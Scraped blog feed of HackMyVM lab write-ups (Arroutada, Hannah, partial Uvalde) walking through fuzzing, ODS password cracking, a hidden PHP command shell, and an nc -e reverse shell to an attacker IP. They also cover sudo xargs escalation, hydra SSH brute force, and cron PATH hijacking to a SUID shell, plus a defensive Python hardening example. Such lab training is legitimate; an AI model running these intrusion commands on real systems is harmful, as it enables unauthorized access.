 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.205.151/scout/FUZZ/docs/
Total requests: 119600

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                             
=====================================================================

000021664:   200        1016 L   12059 W    189769 Ch   'j2'                                                                

Total time: 59.22016
Processed Requests: 119600
Filtered Requests: 119599
Requests/sec.: 2019.582
```

![image-20250331185406586](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250331185406653.png)

pass.txt is just filler; download shellfile.ods directly. It is password-protected, so we crack it:

```
┌──(kali㉿kali)-[~/test]
└─$ file shellfile.ods                                            
shellfile.ods: OpenDocument Spreadsheet
┌──(kali㉿kali)-[~/test]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash             
Using default input encoding: UTF-8
Loaded 1 password hash (ODF, OpenDocument Star/Libre/OpenOffice [PBKDF2-SHA1 512/512 AVX512BW 16x BF/AES])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (crypto [0=Blowfish 1=AES]) is 1 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
john11           (shellfile.ods)   
1g 0:00:00:08 DONE (2025-02-08 16:53) 0.1177g/s 1967p/s 1967c/s 1967C/s lachina..idiot
Use the '--show --format=ODF' options to display all of the cracked passwords reliably
Session completed. 
```

Opening it gives us a path, /thejabasshell.php. Visiting it shows a blank page, so we fuzz its parameters:

```
┌──(kali㉿kali)-[~/test]
└─$ wfuzz -u 'http://192.168.205.151/thejabasshell.php?FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 --hw 0 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.205.151/thejabasshell.php?FUZZ=id
Total requests: 119600

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                             
=====================================================================

000000280:   200        0 L      5 W        33 Ch       'a'                                                                 
000000557:   200        0 L      0 W        0 Ch        'Controls'                                                          

Total time: 0
Processed Requests: 474
Filtered Requests: 473
Requests/sec.: 0

┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.151/thejabasshell.php?a=id
Error: Problem with parameter 'b'                                                                                                                                
```

It also wants a `b` parameter:

```
┌──(kali㉿kali)-[~/test]
└─$ wfuzz -u 'http://192.168.205.151/thejabasshell.php?a=id&amp;b=FUZZ' -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 --hw 5
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.205.151/thejabasshell.php?a=id&amp;b=FUZZ
Total requests: 119600

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                             
=====================================================================

000001999:   200        1 L      3 W        54 Ch       'pass'                                                              
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 41.29983
Processed Requests: 56690
Filtered Requests: 56689
Requests/sec.: 1372.644

┌──(kali㉿kali)-[~/test]
└─$ curl 'http://192.168.205.151/thejabasshell.php?a=id&amp;b=pass'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
                        
```

Use the `a` parameter to get a reverse shell back.

# 3. Getting a stable shell

After getting the reverse shell, upgrade it to a stable interactive TTY shell with the following commands:

```bash
script /dev/null -c bash
# press Ctrl+Z to background the shell, then:
stty raw -echo; fg
reset xterm
export TERM=xterm
echo $SHELL
export SHELL=/bin/bash
stty rows 59 cols 236
```

# 4. Privilege escalation

```
www-data@arroutada:/var/www/html$ ls -al
total 24
drwxr-xr-x  4 root root 4096 Jan  8  2023 .
drwxr-xr-x  3 root root 4096 Jan  8  2023 ..
drwxr-xr-x  2 root root 4096 Jan  8  2023 imgs
-rw-r--r--  1 root root   59 Jan  8  2023 index.html
drwxr-xr-x 22 root root 4096 Jan  8  2023 scout
-rw-r--r--  1 root root  174 Jan  8  2023 thejabasshell.php
www-data@arroutada:/var/www/html$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for www-data: 
sudo: a password is required
www-data@arroutada:/var/www/html$ cd ..
www-data@arroutada:/var/www$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Jan  8  2023 .
drwxr-xr-x 12 root root 4096 Jan  8  2023 ..
drwxr-xr-x  4 root root 4096 Jan  8  2023 html
www-data@arroutada:/var/www$ cd ..
www-data@arroutada:/var$ ls -al
total 48
drwxr-xr-x 12 root root  4096 Jan  8  2023 .
drwxr-xr-x 18 root root  4096 Jan  8  2023 ..
drwxr-xr-x  2 root root  4096 Sep  3  2022 backups
drwxr-xr-x 10 root root  4096 Jan  8  2023 cache
drwxr-xr-x 26 root root  4096 Jan  8  2023 lib
drwxrwsr-x  2 root staff 4096 Sep  3  2022 local
lrwxrwxrwx  1 root root     9 Jan  8  2023 lock -&gt; /run/lock
drwxr-xr-x  8 root root  4096 Jan  8  2023 log
drwxrwsr-x  2 root mail  4096 Jan  8  2023 mail
drwxr-xr-x  2 root root  4096 Jan  8  2023 opt
lrwxrwxrwx  1 root root     4 Jan  8  2023 run -&gt; /run
drwxr-xr-x  4 root root  4096 Jan  8  2023 spool
drwxrwxrwt  2 root root  4096 Feb  8 03:46 tmp
drwxr-xr-x  3 root root  4096 Jan  8  2023 www
www-data@arroutada:/var$ cd /home/
www-data@arroutada:/home$ ls -al
total 12
drwxr-xr-x  3 root  root  4096 Jan  8  2023 .
drwxr-xr-x 18 root  root  4096 Jan  8  2023 ..
drwxr-x---  3 drito drito 4096 Jan 10  2023 drito
www-data@arroutada:/home$ cd /opt/
www-data@arroutada:/opt$ ls -al
total 8
drwxr-xr-x  2 root root 4096 Jan  8  2023 .
drwxr-xr-x 18 root root 4096 Jan  8  2023 ..
www-data@arroutada:/opt$ cd /tmp/
www-data@arroutada:/tmp$ sl -al
bash: sl: command not found
www-data@arroutada:/tmp$ ls -al
total 8
drwxrwxrwt  2 root root 4096 Feb  8 03:46 .
drwxr-xr-x 18 root root 4096 Jan  8  2023 ..
www-data@arroutada:/tmp$ cd /
www-data@arroutada:/$ ls -la
total 68
drwxr-xr-x  18 root root  4096 Jan  8  2023 .
drwxr-xr-x  18 root root  4096 Jan  8  2023 ..
lrwxrwxrwx   1 root root     7 Jan  8  2023 bin -&gt; usr/bin
drwxr-xr-x   3 root root  4096 Jan  8  2023 boot
drwxr-xr-x  17 root root  3140 Feb  8 03:46 dev
drwxr-xr-x  66 root root  4096 Feb  8 03:46 etc
drwxr-xr-x   3 root root  4096 Jan  8  2023 home
lrwxrwxrwx   1 root root    31 Jan  8  2023 initrd.img -&gt; boot/initrd.img-5.10.0-20-amd64
lrwxrwxrwx   1 root root    31 Jan  8  2023 initrd.img.old -&gt; boot/initrd.img-5.10.0-18-amd64
lrwxrwxrwx   1 root root     7 Jan  8  2023 lib -&gt; usr/lib
lrwxrwxrwx   1 root root     9 Jan  8  2023 lib32 -&gt; usr/lib32
lrwxrwxrwx   1 root root     9 Jan  8  2023 lib64 -&gt; usr/lib64
lrwxrwxrwx   1 root root    10 Jan  8  2023 libx32 -&gt; usr/libx32
drwx------   2 root root 16384 Jan  8  2023 lost+found
drwxr-xr-x   3 root root  4096 Jan  8  2023 media
drwxr-xr-x   2 root root  4096 Jan  8  2023 mnt
drwxr-xr-x   2 root root  4096 Jan  8  2023 opt
dr-xr-xr-x 150 root root     0 Feb  8 03:46 proc
drwx------   3 root root  4096 Jan  8  2023 root
drwxr-xr-x  17 root root   480 Feb  8 03:46 run
lrwxrwxrwx   1 root root     8 Jan  8  2023 sbin -&gt; usr/sbin
drwxr-xr-x   2 root root  4096 Jan  8  2023 srv
dr-xr-xr-x  13 root root     0 Feb  8 03:46 sys
drwxrwxrwt   2 root root  4096 Feb  8 03:46 tmp
drwxr-xr-x  14 root root  4096 Jan  8  2023 usr
drwxr-xr-x  12 root root  4096 Jan  8  2023 var
lrwxrwxrwx   1 root root    28 Jan  8  2023 vmlinuz -&gt; boot/vmlinuz-5.10.0-20-amd64
lrwxrwxrwx   1 root root    28 Jan  8  2023 vmlinuz.old -&gt; boot/vmlinuz-5.10.0-18-amd64
www-data@arroutada:/$ find / -perm -4000 -type f 2&gt;/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/umount
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
www-data@arroutada:/$ /sbin/getcap -r / 2&gt;/dev/null
/usr/bin/ping cap_net_raw=ep
www-data@arroutada:/$ ss -tnlup
Netid                   State                    Recv-Q                   Send-Q                                     Local Address:Port                                       Peer Address:Port                   Process                 
udp                     UNCONN                   0                        0                                                0.0.0.0:68                                              0.0.0.0:*                                              
tcp                     LISTEN                   0                        4096                                           127.0.0.1:8000                                            0.0.0.0:*                                              
tcp                     LISTEN                   0                        511                                                    *:80                                                    *:*             
```

Port 8000 is listening on localhost only, so we need to forward it, but the socat we have is missing a shared library (.so), so let's just look for other tools.

```
www-data@arroutada:/tmp$ curl http://127.0.0.1:5000
bash: curl: command not found
www-data@arroutada:/tmp$ wget http://127.0.0.1:8000
--2025-02-08 04:00:55--  http://127.0.0.1:8000/
Connecting to 127.0.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 319 [text/html]
Saving to: 'index.html'

index.html                                                   0%[                                                                       index.html                                                 100%[========================================================================================================================================&gt;]     319  --.-KB/s    in 0s    

2025-02-08 04:00:55 (116 MB/s) - 'index.html' saved [319/319]

www-data@arroutada:/tmp$ ls -la
total 476
drwxrwxrwt  2 root     root       4096 Feb  8 04:00 .
drwxr-xr-x 18 root     root       4096 Jan  8  2023 ..
-rw-r--r--  1 www-data www-data    319 Feb  8 04:00 index.html
-rwxr-xr-x  1 www-data www-data 473256 Jan 29 19:48 socat
www-data@arroutada:/tmp$ cat index.html 
&lt;h1&gt;Service under maintenance&lt;/h1&gt;


&lt;br&gt;


&lt;h6&gt;This site is from ++++++++++[&gt;+&gt;+++&gt;+++++++&gt;++++++++++&lt;&lt;&lt;&lt;-]&gt;&gt;&gt;&gt;---.+++++++++++..&lt;&lt;++.&gt;++.&gt;-----------.++.++++++++.&lt;+++++.&gt;++++++++++++++.&lt;+++++++++.---------.&lt;.&gt;&gt;-----------------.-------.++.++++++++.------.+++++++++++++.+.&lt;&lt;+..&lt;/h6&gt;

&lt;!-- Please sanitize /priv.php --&gt;
```

![image-20250331185429009](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250331185429071.png)

So let's look at the /priv.php it hints at:

```
www-data@arroutada:/tmp$ wget http://127.0.0.1:8000/priv.php
--2025-02-08 04:01:52--  http://127.0.0.1:8000/priv.php
Connecting to 127.0.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: 'priv.php'

priv.php                                                       [&lt;=&gt;                                                                    priv.php                                                       [ &lt;=&gt;                                                                                                                                     ]     308  --.-KB/s    in 0s    

2025-02-08 04:01:52 (111 MB/s) - 'priv.php' saved [308]

www-data@arroutada:/tmp$ cat priv.php 
Error: the 'command' parameter is not specified in the request body.

/*

$json = file_get_contents('php://input');
$data = json_decode($json, true);

if (isset($data['command'])) {
    system($data['command']);
} else {
    echo "Error: the 'command' parameter is not specified in the request body.";
}

*/
```

It says we are missing a parameter, so we just add it:

```
www-data@arroutada:/tmp$ wget --post-data='{"command":"whoami"}' http://127.0.0.1:8000/priv.php -q -O -
drito


/*

$json = file_get_contents('php://input');
$data = json_decode($json, true);

if (isset($data['command'])) {
    system($data['command']);
} else {
    echo "Error: the 'command' parameter is not specified in the request body.";
}

*/
```
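
Both the aurora post's `/execute` route (which crashed inside `exec()` when the command field was missing) and priv.php here hand a client-supplied string straight to a shell via `exec()` / `system()`. The Python below is an added example, not code from this post or from either box, that shows that pattern beside a hardened handler: authorization first, a request that names an action rather than supplying a command, a fixed allowlist of argv vectors run with `subprocess.run` and no shell, and a log line for every decision. The action names `interpreter_version` and `hostname` are hypothetical and chosen so the example runs anywhere Python does.

```python
import json
import logging
import subprocess
import sys

log = logging.getLogger("execute-endpoint")

# Allowlist: request "action" names mapped to fixed argv vectors (hypothetical actions).
# No string from the request is ever passed to a shell or spliced into argv.
ALLOWED_ACTIONS = {
    "interpreter_version": [sys.executable, "--version"],
    "hostname": [sys.executable, "-c", "import socket; print(socket.gethostname())"],
}


def vulnerable_handler(body):
    """Shape of priv.php and the /execute route: the client supplies the command text.
    Returns what system()/exec() would have been handed instead of running it."""
    data = json.loads(body)
    if "command" in data:
        return ("shell", data["command"])
    return ("error", "the 'command' parameter is not specified in the request body")


def hardened_handler(body, role):
    """Authorize, map the request to an allowlisted argv, run it without a shell, log it."""
    if role != "admin":
        log.warning("execute denied: role=%r", role)
        return {"status": 403, "output": "Unauthorized"}
    try:
        data = json.loads(body)
    except ValueError:
        return {"status": 400, "output": "body must be JSON"}
    action = data.get("action") if isinstance(data, dict) else None
    if not isinstance(action, str) or action not in ALLOWED_ACTIONS:
        log.warning("execute rejected: unknown action=%r", action)
        return {"status": 400, "output": "unknown action"}
    try:
        proc = subprocess.run(ALLOWED_ACTIONS[action], capture_output=True, text=True, timeout=10)
    except subprocess.TimeoutExpired:
        log.error("execute timed out: action=%r", action)
        return {"status": 504, "output": "timed out"}
    log.info("execute ran action=%r rc=%d", action, proc.returncode)
    return {"status": 200, "output": proc.stdout.strip(), "rc": proc.returncode}


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    print(vulnerable_handler('{"command":"whoami"}'))            # ("shell", "whoami")
    print(hardened_handler('{"command":"whoami"}', "admin"))      # 400: no such action
    print(hardened_handler('{"action":"interpreter_version"}', "user"))   # 403
    print(hardened_handler('{"action":"interpreter_version"}', "admin"))  # 200
```

The vulnerable handler is deliberately not wired to `subprocess`; the point of the comparison is that in the hardened version the request can only select among commands the service already defined, so the `command` field that priv.php trusted is simply meaningless.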

Exploitation:

```
www-data@arroutada:/tmp$ wget --post-data='{"command":"nc 192.168.205.128 8888 -e /bin/bash"}' http://127.0.0.1:8000/priv.php -q -O -
┌──(kali㉿kali)-[~/test]
└─$ nc -lvnp 8888           
listening on [any] 8888 ...
connect to [192.168.205.128] from (UNKNOWN) [192.168.205.151] 60268
id
uid=1001(drito) gid=1001(drito) groups=1001(drito)
```

After getting the reverse shell, upgrade it to a stable interactive TTY shell with the following commands:

```bash
script /dev/null -c bash
# press Ctrl+Z to background the shell, then:
stty raw -echo; fg
reset xterm
export TERM=xterm
echo $SHELL
export SHELL=/bin/bash
stty rows 59 cols 236
```

Privilege escalation:

```
drito@arroutada:~/web$ sudo -l
Matching Defaults entries for drito on arroutada:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User drito may run the following commands on arroutada:
    (ALL : ALL) NOPASSWD: /usr/bin/xargs
```

https://gtfobins.github.io/gtfobins/xargs/#sudo

```bash
drito@arroutada:~/web$ sudo xargs -a /dev/null bash
root@arroutada:/home/drito/web# id
uid=0(root) gid=0(root) groups=0(root)
```

&lt;!-- ##{'timestamp':1739012133}## --&gt;。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Arroutada.html</guid><pubDate>Sat, 08 Feb 2025 10:55:33 +0000</pubDate></item><item><title>hmv_hannah</title><link>https://7r1UMPH.github.io/post/hmv_hannah.html</link><description># hmv_hannah

# 0. Introduction

**Target machine**: https://hackmyvm.eu/machines/machine.php?vm=Hannah  
**Difficulty**: Green  
**Target IP**: 192.168.205.150  
**Local IP**: 192.168.205.128

# 1. Scanning

Start with `nmap`.

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -A -Pn -n --min-rate 10000 192.168.205.150
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 16:07 CST
Nmap scan report for 192.168.205.150
Host is up (0.00031s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 5f:1c:78:36:99:05:32:09:82:d3:d5:05:4c:14:75:d1 (RSA)
|   256 06:69:ef:97:9b:34:d7:f3:c7:96:60:d1:a1:ff:d8:2c (ECDSA)
|_  256 85:3d:da:74:b2:68:4e:a6:f7:e5:f5:85:40:90:2e:9a (ED25519)
|_auth-owners: root
80/tcp  open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-robots.txt: 1 disallowed entry 
|_/enlightenment
|_http-title: Site doesn't have a title (text/html).
|_auth-owners: moksha
113/tcp open  ident?
|_auth-owners: root
MAC Address: 08:00:27:7C:E4:91 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms 192.168.205.150

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.58 seconds
                                                   
```

Port 113 is an unfamiliar service, so check it first.

# 2. Reconnaissance

https://book.hacktricks.wiki/zh/network-services-pentesting/113-pentesting-ident.html#basic-information

```
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.150:113                                                                       
curl: (56) Recv failure: 连接被对方重置
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ nc 192.168.205.150 113 
hello 
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ nc -vn 192.168.205.150 113
(UNKNOWN) [192.168.205.150] 113 (auth) open
hello
                            

┌──(kali㉿kali)-[~/test]
└─$ ident-user-enum 192.168.205.150 80 22 113
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )

192.168.205.150:80      moksha
192.168.205.150:22      root
192.168.205.150:113     root
                               
```

There is a user moksha, so let's try brute-forcing SSH.

```
┌──(kali㉿kali)-[~/test]
└─$ hydra -l moksha -P /usr/share/wordlists/q5000.txt ssh://192.168.205.150 -V -I -u -f -e nsr -t 64

Hydra v9.5 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-08 16:23:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 5003 login tries (l:1/p:5003), ~79 tries per task
[DATA] attacking ssh://192.168.205.150:22/
[22][ssh] host: 192.168.205.150   login: moksha   password: hannah
[STATUS] attack finished for 192.168.205.150 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-08 16:23:44

```

The first time I ran the brute force it didn't find anything, which was honestly a bit frustrating.

```
┌──(kali㉿kali)-[~/test]
└─$ ssh moksha@192.168.205.150    
moksha@192.168.205.150's password: 
Linux hannah 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan  4 10:45:54 2023 from 192.168.1.51
moksha@hannah:~$ id
uid=1000(moksha) gid=1000(moksha) grupos=1000(moksha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

```

# 3. Privilege escalation

```
moksha@hannah:~$ sudo -l
-bash: sudo: orden no encontrada
moksha@hannah:~$ which sudo
moksha@hannah:~$ find / -name sudo 2&gt;/dev/null
/usr/share/bash-completion/completions/sudo
moksha@hannah:~$ /usr/share/bash-completion/completions/sudo -l
-bash: /usr/share/bash-completion/completions/sudo: Permiso denegado
moksha@hannah:~$ ls -la /usr/share/bash-completion/completions/sudo
-rw-r--r-- 1 root root 1504 ago 12  2020 /usr/share/bash-completion/completions/sudo

```

I thought sudo was hidden somewhere again.

```
moksha@hannah:~$ ls -la
total 32
drwxr-xr-x 3 moksha moksha 4096 ene  4  2023 .
drwxr-xr-x 3 root   root   4096 ene  4  2023 ..
lrwxrwxrwx 1 moksha moksha    9 ene  4  2023 .bash_history -&gt; /dev/null
-rw-r--r-- 1 moksha moksha  220 ene  4  2023 .bash_logout
-rw-r--r-- 1 moksha moksha 3526 ene  4  2023 .bashrc
drwxr-xr-x 3 moksha moksha 4096 ene  4  2023 .local
-rw-r--r-- 1 moksha moksha  807 ene  4  2023 .profile
-rw------- 1 moksha moksha   14 ene  4  2023 user.txt
-rw------- 1 moksha moksha   52 ene  4  2023 .Xauthority
moksha@hannah:~$ cd ..
moksha@hannah:/home$ ls -al
total 12
drwxr-xr-x  3 root   root   4096 ene  4  2023 .
drwxr-xr-x 18 root   root   4096 ene  4  2023 ..
drwxr-xr-x  3 moksha moksha 4096 ene  4  2023 moksha
moksha@hannah:/home$ find / -perm -4000 -type f 2&gt;/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
moksha@hannah:/home$ /sbin/getcap -r / 2&gt;/dev/null
/usr/bin/ping cap_net_raw=ep
moksha@hannah:/home$ cat /etc/cron*
cat: /etc/cron.d: Es un directorio
cat: /etc/cron.daily: Es un directorio
cat: /etc/cron.hourly: Es un directorio
cat: /etc/cron.monthly: Es un directorio
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/media:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
* * * * * root touch /tmp/enlIghtenment
17 *    * * *   root    cd / &amp;&amp; run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.monthly )
#
cat: /etc/cron.weekly: Es un directorio

moksha@hannah:/tmp$ which touch
/usr/bin/touch

moksha@hannah:/tmp$ ls -la /media
total 12
drwxrwxrwx  3 root root 4096 ene  4  2023 .
drwxr-xr-x 18 root root 4096 ene  4  2023 ..
lrwxrwxrwx  1 root root    6 ene  4  2023 cdrom -&gt; cdrom0
drwxr-xr-x  2 root root 4096 ene  4  2023 cdrom0

```

There is a cron job, and we can see that its environment variable (PATH) is also problematic, so:

```
moksha@hannah:/tmp$ echo 'cp /bin/bash /tmp/sh;chmod u+s /tmp/sh' &gt; /media/touch
moksha@hannah:/tmp$ ls /tmp/
enlIghtenment
systemd-private-7e7d884382b944e89570ebdfb081124b-systemd-logind.service-Bwv8Xg
systemd-private-7e7d884382b944e89570ebdfb081124b-systemd-timesyncd.service-S60g6e
moksha@hannah:/tmp$ chmod +x /media/touch

```

Let the bullets fly for a while (wait for the cron job to run).

```
moksha@hannah:/tmp$ ls
enlIghtenment  systemd-private-7e7d884382b944e89570ebdfb081124b-systemd-logind.service-Bwv8Xg
sh             systemd-private-7e7d884382b944e89570ebdfb081124b-systemd-timesyncd.service-S60g6e
moksha@hannah:/tmp$ ./sh -p
sh-5.1# id
uid=1000(moksha) gid=1000(moksha) euid=0(root) grupos=1000(moksha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

```

‍&lt;!-- ##{'timestamp':1739012133}## --&gt;。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_hannah.html</guid><pubDate>Sat, 08 Feb 2025 10:55:33 +0000</pubDate></item><item><title>hmv_uvalde</title><link>https://7r1UMPH.github.io/post/hmv_uvalde.html</link><description># 0. Introduction

Target machine: https://hackmyvm.eu/machines/machine.php?vm=Uvalde
 Difficulty: Green
 Target IP: 192.168.205.149
 Local IP: 192.168.205.128

# 1. Scanning

Start with nmap.

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -A -Pn -n --min-rate 10000 192.168.205.149
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 09:15 CST
Nmap scan report for 192.168.205.149
Host is up (0.00022s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.205.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1000     1000         5154 Jan 28  2023 output
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 3a:09:a4:da:d7:db:99:ee:a5:51:05:e9:af:e7:08:90 (RSA)
|   256 cb:42:6a:be:22:13:2c:f2:57:f9:80:d1:f7:fb:88:5c (ECDSA)
|_  256 44:3c:b4:0f:aa:c3:94:fa:23:15:19:e3:e5:18:56:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Agency - Start Bootstrap Theme
MAC Address: 08:00:27:79:3A:5B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.205.149

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds
```

# 2. Reconnaissance

```
┌──(kali㉿kali)-[~/test]
└─$ ftp 192.168.205.149                          
Connected to 192.168.205.149.
220 (vsFTPd 3.0.3)
Name (192.168.205.149:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls -al
229 Entering Extended Passive Mode (|||61334|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        116          4096 Jan 28  2023 .
drwxr-xr-x    2 0        116          4096 Jan 28  2023 ..
-rw-r--r--    1 1000     1000         5154 Jan 28  2023 output
226 Directory send OK.
ftp&gt; mget output
mget output [anpqy?]? y
229 Entering Extended Passive Mode (|||41326|)
150 Opening BINARY mode data connection for output (5154 bytes).
100% |*****************************************************************************************|  5154        9.15 MiB/s    00:00 ETA
226 Transfer complete.
5154 bytes received in 00:00 (4.77 MiB/s)
ftp&gt; exit
221 Goodbye.
                              
┌──(kali㉿kali)-[~/test]
└─$ file output 
output: Unicode text, UTF-8 text, with very long lines (328), with CRLF, CR, LF line terminators, with escape sequences, with overstriking
           
┌──(kali㉿kali)-[~/test]
└─$ cat output  
Script démarré sur 2023-01-28 19:54:05+01:00 [TERM='xterm-256color' TTY='/dev/pts/0' COLUMNS='105' LINES='25']
matthew@debian:~$ id
uid=1000(matthew) gid=1000(matthew) groupes=1000(matthew)
matthew@debian:~$ ls -al
total 32
drwxr-xr-x 4 matthew matthew 4096 28 janv. 19:54 .
drwxr-xr-x 3 root    root    4096 23 janv. 07:52 ..
lrwxrwxrwx 1 root    root       9 23 janv. 07:53 .bash_history -&gt; /dev/null
-rw-r--r-- 1 matthew matthew  220 23 janv. 07:51 .bash_logout
